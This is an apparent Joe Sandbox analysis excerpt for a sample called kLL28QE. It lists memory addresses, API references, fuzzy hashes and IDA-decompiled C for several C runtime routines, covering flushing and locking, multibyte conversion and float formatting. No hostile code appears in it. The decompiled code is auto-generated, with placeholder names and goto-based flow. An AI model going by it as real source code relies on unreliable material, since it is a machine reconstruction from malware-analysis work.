                                                                                                                                                                                                      0x0040bb38
                                                                                                                                                                                                      0x0040bb3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bb3c
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbf1
                                                                                                                                                                                                      0x0040bb42
                                                                                                                                                                                                      0x0040bb44
                                                                                                                                                                                                      0x0040bb46
                                                                                                                                                                                                      0x0040bb48
                                                                                                                                                                                                      0x0040bb48
                                                                                                                                                                                                      0x0040bb50
                                                                                                                                                                                                      0x0040bb55
                                                                                                                                                                                                      0x0040bb58
                                                                                                                                                                                                      0x0040bb5a
                                                                                                                                                                                                      0x0040bb5d
                                                                                                                                                                                                      0x0040bb5f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                                                      0x0040bbe1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bb2a
                                                                                                                                                                                                      0x0040bb24
                                                                                                                                                                                                      0x0040bac8
                                                                                                                                                                                                      0x0040bac8
                                                                                                                                                                                                      0x0040bacd
                                                                                                                                                                                                      0x0040bace
                                                                                                                                                                                                      0x0040bacf
                                                                                                                                                                                                      0x0040bad0
                                                                                                                                                                                                      0x0040bad1
                                                                                                                                                                                                      0x0040bad2
                                                                                                                                                                                                      0x0040bad8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040badd

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				char _t43;
                                                                                                                                                                                                      				char _t46;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t57;
                                                                                                                                                                                                      				int _t58;
                                                                                                                                                                                                      				signed short* _t59;
                                                                                                                                                                                                      				short* _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char* _t72;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 = _a8;
                                                                                                                                                                                                      				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if( *_t72 != 0) {
                                                                                                                                                                                                      						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                      						_t43 = _v20;
                                                                                                                                                                                                      						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                      						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                      							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      							if(_t46 == 0) {
                                                                                                                                                                                                      								__eflags = _a4;
                                                                                                                                                                                                      								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L10:
                                                                                                                                                                                                      									__eflags = _v8;
                                                                                                                                                                                                      									if(_v8 != 0) {
                                                                                                                                                                                                      										_t53 = _v12;
                                                                                                                                                                                                      										_t11 = _t53 + 0x70;
                                                                                                                                                                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                      										__eflags =  *_t11;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									return 1;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L21:
                                                                                                                                                                                                      								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                      								 *_t54 = 0x2a;
                                                                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                                                                      								if(_v8 != 0) {
                                                                                                                                                                                                      									_t54 = _v12;
                                                                                                                                                                                                      									_t33 = _t54 + 0x70;
                                                                                                                                                                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                      									__eflags =  *_t33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return _t54 | 0xffffffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                                                                      							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                      							__eflags = _t65 - 1;
                                                                                                                                                                                                      							if(_t65 <= 1) {
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t72[1];
                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L19:
                                                                                                                                                                                                      								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                                                                      								if(_v8 == 0) {
                                                                                                                                                                                                      									return _t57;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                      								return _t57;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _a12 - _t65;
                                                                                                                                                                                                      							if(_a12 < _t65) {
                                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _a4;
                                                                                                                                                                                                      							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                      							__eflags = _t58;
                                                                                                                                                                                                      							_t56 = _v20;
                                                                                                                                                                                                      							if(_t58 != 0) {
                                                                                                                                                                                                      								goto L19;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L17;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 = _a4;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t60 = _a4;
                                                                                                                                                                                                      						if(_t60 != 0) {
                                                                                                                                                                                                      							 *_t60 = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t25 = _a16;
                                                                                                                                                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                      					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t25 - 0x66;
                                                                                                                                                                                                      					if(_t25 != 0x66) {
                                                                                                                                                                                                      						__eflags = _t25 - 0x61;
                                                                                                                                                                                                      						if(_t25 == 0x61) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t25 - 0x41;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						return _t26;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%